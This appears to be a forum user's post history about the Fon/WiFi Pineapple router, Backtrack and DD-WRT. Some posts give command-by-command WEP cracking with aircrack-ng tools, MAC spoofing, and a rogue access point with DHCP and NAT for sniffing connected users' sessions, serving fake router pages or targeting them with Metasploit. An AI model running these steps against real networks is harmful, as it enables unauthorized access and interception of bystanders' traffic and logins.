easycheese
-
Posts
20 -
Joined
-
Last visited
Posts posted by easycheese
-
-
" Debricking -- Console access via Serial "
That is the first post on the forum under this toppic, that will tell you what you need to know.
-
The WRT54G V7 has Atheros AR2317 chipset with 2MGs flash memory.
-
yeah im planing on buying a Fon+, Currently i have the fon 2100
-
Quoted from the Store:
"The WiFi Pineapple comes assembled as a Fon 2100 with soldered on 4 AA battery holder with on/off switch housed inside a plastic pineapple shell. The original Fon case and US power adapter as well as Hak5 and Battle Pineapple stickers are included."
-
yeah, i agree. Im not sure why it is set to Zero either. It might be how dd-wrt is when its installed, i have only ever played with OpenWRT so im still learning all that is dd-wrt
-
You get the pineapple, power supply, original Fon case, stickers, battery pack connected to the Fon, instructions on using the fon for the first time
-
-
I noticed that as well. I too had weak signal until i ajusted it. I believe the stock Fon Antenna is only a 1.5 DB gain antenna
-
easycheese - your tutorial looks great! thanks for putting that together.
I've been struggling off and on with setting up ICS for quite some time, and couldn't figure out what I was doing wrong.
I'm currently working with the "piranha firmware" and it seems now that my main problem is that I CAN NOT get the 'connection type' drop down box to display all the options when I select DHCP. I've tried over and over going between static and back to DHCP, but just cannot get the options to come up.
does anyone have any insight on this? am i missing something? or should i just not use this firmware and go with the version being used in the tutorial.
thanks
What options are you getting, you said you dont get all the options right?
-
In backpack:
Acer Aspire One DualBoot WinXP/Backtrack4 w/ EDGE/UMTS Modem
Work laptop Dell 650 XP
Fon with Jasager
Nokia 770
Bluetooth GPS Puck
USB Bluetooth hub
2 Edge/UMTS Modems
cat5 cables
Screw Drivers
Batterys
Linux Pocket guide
headphones
mouse
Pen and paper
usb cables
microSD to SD converter
1 extra CellPhone
-
The pictures didnt copy over, but if you check my site you can see them.
-
This is howi have my setup, im using backtrack and the pineapple.
I have the Pineapple connected to my Lappy with cat5, and have backtrack running a DHCP server. This is a first Tech artical i wrote, let me know if im missing something or if you try this setup and have problems. Its located:
www.dc425.org/dhcp
1. For this im using DHCP3 as my DHCP server.
2. I also used Darren Kitchens Tutorial on Hak5.org for ICS.
3. I created this so i can use the Setup of "evil wifi" located here.
Software needed:
1. Backtrack4
2. Dhcp3
3. A Brain
I used Darrens Setup for ICS for windows for my Fon, so i can use it both on windows, and Linux.
I did the following setup on the fon.
Let’s assume that you have successfully installed Der Jasager as per this tutorial. Once you’ve done this go ahead and log in to Der Jasager’s webif interface using a web browser. In my case it was http://192.168.1.1/webif.html. Click the “Network” tab.
Change the drop down box next to “Connection Type” from whatever it is set to, to something like Static IP and then back to DHCP. Do this a couple of times. For some reason, in my webif interface, when I change to DHCP, not all settings are available until I do this. In any case, you’ll want to see these options:
Change the IP address to something on the same subnet as your non-Internet Connection Shared NIC (that’s “Atheros”on eniac). I changed the IP in the webif interface to 192.168.0.250.
Set the Netmask to the default class C address (255.255.255.0).
Save your configuration twice. Once using the “Save Changes” button and then again using the “Apply Changes” button.
I saved the changes this way, just to be safe. Now, remove power from the Fonera that’s running Der Jasager. Re-associate the ICS’ed NIC to its original access point. In my case, I re-associated “Alfa” to “WRT54G”. Wait a minute, and reapply power to the La Fonera. Then wait a while for the Fonera to boot and the non-ICS’ed NIC (“Atheros” in my case) to associate to “OpenWrt”.
You can now open Der Jasager’s web interface in a browser, by connecting and authenticating to the new IP address you just set up. In my case that would be http://192.168.0.250. Here’s how mine looks.
After that, lets setup DHCP server on backtrack
DHCP3 How too:
I first updated dhcp3 on backtrack4. You dont have to do this, but if you want do:
sudo apt-get install dhcp3
Then backed up dhcp.conf and erased the contents of the file. Its located at the following:
/etc/dhcp3/dhcp.conf
This is what my dhcp.conf file looks like:
ddns-updates off;
option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-update-style none;
option domain-name-servers 208.67.222.222, 208.67.220.220;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.0.0 netmask 255.255.255.0 {
interface eth0;
range 192.168.0.2 192.168.0.254;
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option routers 192.168.0.2;
option domain-name-servers 208.67.222.222, 208.67.220.220;
}
This i edited /etc/network/interfaces; under auto eth0 this is what i have:
auto eth0
iface eth0 inet static
address 192.168.0.1
network 192.168.0.1/24
netmask 255.255.255.0
Broadcast 192.168.0.254
Then you must tell the dhcp3-server what adapter to listen to. This is located at /etc/default/dhcp3-server Edit that file and under INTERFACES add eth0. It should look like the following:
INTERFACES="eth0"
Next i set the ipaddress of eth0:
sudo ifconfig eth0 inet 192.168.0.2
Next you have to allow all connections through iptables out throught the world, depending on the adapter that is connected to the internet you will have to change it in the command. But the command that i used i let the connection out through my wireless so i use wlan0.
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
You also need to allow ip forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now you need to connect the Fon to your laptop. Once connected, start the DHCP server by entering the following:
sudo /etc/init.d/dhcp3-server start
Once started, you can check for Dhcp leases with the following
cat /var/lib/dhcp3/dhcp-leases
Now you can startup Hamster and Ferret, Als you can run an Apachi server, with a fake Router page, or what ever you want.
-
if your using backtrack
you can use the command:
1. ifconfig [interface] down
2. sudo iwconfig [interface] nw ether [MAC Address]
3. ifconfig [interface] up
Command 2 will look like something:
sudo iwconfig wlan0 nw ether 00:11:22:33:44:55
-
i have found that there must be some setting in the router to stop replying to the injected packets, never got around to figuring it out but the occasional WEP AP wasnt crackable unless you just collected packets. not too sure what the setting would be, may even be a factory set setting
Yeah like i was saying, my Orinoco AP2000 AP will only let me inject 15 packets a second. Anything more than that it just rejects the traffic from my laptop. I would try and lower the injection rate. Lets say you used fragment attack. Then to replay the packet you forged using packetforge, you use "aireplay-ng -2 -x 150 -r packet [interface]
-x lets you say how many packets a second you inject.
I would try and lower the number until you find how much you can inject before your AP stops allowing you to inject.
-
What is the command to start DHCP
-
This is my airbase-ng script http://www.dc425.org/softap
-
I dont have first hand exsperiance, but the ones i have used worked well.
-
yep, did it all the way you're saying except the -x 150 on the -2 aireplay-ng. I've tried all sorts of different attacks on my wifi router. The -9 injection test comes out working, and the injection thinks it's working but it's not seeming to really do anything. It looks like it's a common problem with the ipw3945 driver on the 3945abg chipset. I found it all over the remote exploit forums. I've also been living in the remote exploit IRC. I'm looking for an ipwraw download now, even though I get my alfa on Friday.
Let me know how it goes. The `-x 150` is how many packets you inject every second. I found that most AP's work the best with injecting 150 a second. Now that being said, i have an Orinoco AP2000 that will only let me inject 20 a second before it deaths me and will not let me fake auth.
-
I sat at home on Saturday and set up a router to crack the WEP on my a wifi router. Linksys wrt310n, and none of the injections were working. I eventually was able to get enough IVs to get the hex, but it took 6 hours of sniffing and setting 2 machines to continually ping invalid IP addresses. I tried every type of injection aireplay-ng had, changed my cards mac addy to simulate another machine and everything. Nothing seemed to make the IVs go up any faster. I'm using a centrino based laptop so intel wifi, that is supported, and I was right next to the AP. I was wondering if I'm missing some fundamental part of this. I went through tons of video and blogged tutorials trying to make the injection work, but it just never seemed to work.
What Wifi card are you using?
Did you try and test the Injection Percetage? `aireplay-ng -9 interface`
That should tell you injection is working and a percentage on how well it was able to inject. Also what attack are you running. I have the best luck with Packet Fragmitation i believe thats option 5.
I usually setup airodump on the AP
airodump-ng -c 11 -bssid 00:11:22:33:44:55 -w /tmp/owned interface
then fake ath on the Router
aireplay-ng -1 30 -a {MAC of AP} interface
then:
aireplay-ng -5 -b {MAC of AP} interface
after it finds a packet and writes the fragmention to your drive run Packetforge to create a packet to replay back to the AP.
packetforge -0 -a {MAC of AP} -h {MAC OF YOUR CARD} -k 255.255.255.255 -l 255.255.255.255 -y {The Fragmintaion File that was created should end with .xor} -w packet
`-w is writing the packet to replay back to the AP`
then using aireplay again to replay "packet" to the AP.
aireplay-ng -2 -x 150 -r packet interface
after gathering some IV's run aircrack for some good ol fun
aircrack-ng capturefile
*remember only test your own AP*
Problem: Connecting Fon+Jaseger to Metasploit+Karma
in WiFi Pineapples Mark I, II, III
Posted
my site talks you though setting up Backtrack4 and Fon for this very perpous. www.dc425.org/dhcp . though i know on that site it states that you need a crossover cable i am not using on and it works fine for me.
This setup will get internet sharing working so those connected to the Fon will be able to browse, and all traffic will come over the wire though your laptop and out your wireless. DHCP is shown on the leeses list. and in my tutorial it shows you how to see when a new lease is added.
Also once connected you just point Metasploit on eth0 and you will be able to target those that connect. i hope it helps let me know if you have any other questions.
I can also make a quick tutorial on using metasploit with this setup if you want.